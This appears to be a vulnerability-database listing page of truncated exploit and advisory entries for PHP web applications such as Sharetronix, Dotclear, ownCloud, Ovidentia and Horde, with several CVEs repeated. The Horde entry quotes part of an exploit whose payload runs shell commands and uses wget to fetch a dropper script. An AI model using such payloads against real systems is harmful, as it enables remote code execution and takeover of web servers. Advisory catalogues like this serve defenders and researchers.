Active Collab "chat module" <= 2.3.8 - Remote PHP Code Injection Exploit

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

ovidentia 5.6.x/5.8 options.php babInstallPath Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote files...

Rama CMS <= 0.9.8 (download.php file) File Disclosure Vulnerability

No description provided by source. Start info: Script Name: Rama Zaitan Cms Script Project: http://sourceforge.net/project/showfiles.php?groupid=212495&packageid=255590 Download: http://sourceforge.net/project/downloading.php?groupid=212495&filename=cms975.zip&a=5782381 0.9.5 = Versions =0.9.8 by...

FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability

No description provided by source. Document Title: =============== FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1231 Release Date: ============= 2014-03-20 Vulnerability Laboratory ID VL-ID:...

phpMyTourney 2 - tourney/index.php Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/28057/info phpMyTourney is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing maliciou...

mcGuestbook 1.3 ecrire.php lang Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/18476/info mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote file...

Horde Framework Unserialize PHP Code Execution

ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...

苹果CMS SQL注入一枚无视GPC,无视内置360防护脚本,无视太多..第一发

简要描述： RTRT,开个玩笑罢了 详细说明： 先来看看首页index.php location.href='install.php';';exit; require"inc/conn.php"; requireMACROOT.'/inc/common/360safe3.php';//好恐怖，内置了360,不过对后面的注入没有影响 $m = be'get','m';//这个地方会转义一次，但对我们也没影响 ifstrpos$m,'.' $m = substr$m,0,strpos$m,'.'; $par = explode'-',$m; $parlen = count$par; $ac...

Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit

Summary Lunar CMS is a freely distributable open source content management system written for use on servers running the ever so popular PHP5 & MySQL. Description Lunar CMS suffers from an unauthenticated arbitrary command execution vulnerability. The issue is caused due to the improper...

CVE-2013-5352

Sharetronix 3.1.1.3, 3.1.1, and earlier allows remote attackers to execute arbitrary PHP code via the 1 activitiestext parameter to services/activities/set or 2 commentstext parameter to services/comments/set, which is not properly handled when executing the pregreplace function with the e modifi...

CVE-2013-5352

Sharetronix 3.1.1.3 and earlier versions are vulnerable to remote PHP code execution via the activities_text parameter to /services/activities/set or the comments_text parameter to /services/comments/set, caused by unsafe handling of the PHP preg_replace function with the /e modifier. The vulnera...

Sharetronix <= 3.1.1 Two PHP Code Injection Vulnerabilities

Sharetronix 3.1.1.3, 3.1.1, and earlier allows remote attackers to execute arbitrary PHP code via the 1 activitiestext parameter to services/activities/set or 2 commentstext parameter to services/comments/set, which is not properly handled when executing the pregreplace function with the e...

CVE-2014-3782

Multiple incomplete blacklist vulnerabilities in the filemanager::isFileExclude method in the Media Manager in Dotclear before 2.6.3 allow remote authenticated users to execute arbitrary PHP code by uploading a file with a 1 double extension or 2 .php5, 3 .phtml, or some other PHP file extension...

Input validation

Multiple incomplete blacklist vulnerabilities in the filemanager::isFileExclude method in the Media Manager in Dotclear before 2.6.3 allow remote authenticated users to execute arbitrary PHP code by uploading a file with a 1 double extension or 2 .php5, 3 .phtml, or some other PHP file extension...

CVE-2014-3782

Multiple incomplete blacklist vulnerabilities in the filemanager::isFileExclude method in the Media Manager in Dotclear before 2.6.3 allow remote authenticated users to execute arbitrary PHP code by uploading a file with a 1 double extension or 2 .php5, 3 .phtml, or some other PHP file extension...

CVE-2014-3782

Summary: CVE-2014-3782 affects Dotclear

Unrestricted Upload of File with Dangerous Type in BoltWire

High-Tech Bridge Security Research Lab discovered vulnerability in BoltWire, which can be exploited to execute arbitrary PHP code on the target system and gain complete control over vulnerable web application. 1 Unrestricted Upload of File with Dangerous Type in BoltWire: CVE-2014-4169 The...

CVE-2013-0204

settings/personal.php in ownCloud 4.5.x before 4.5.6 allows remote authenticated users to execute arbitrary PHP code via crafted mount point settings...

Code injection

settings/personal.php in ownCloud 4.5.x before 4.5.6 allows remote authenticated users to execute arbitrary PHP code via crafted mount point settings...

CVE-2013-0204

settings/personal.php in ownCloud 4.5.x before 4.5.6 allows remote authenticated users to execute arbitrary PHP code via crafted mount point settings...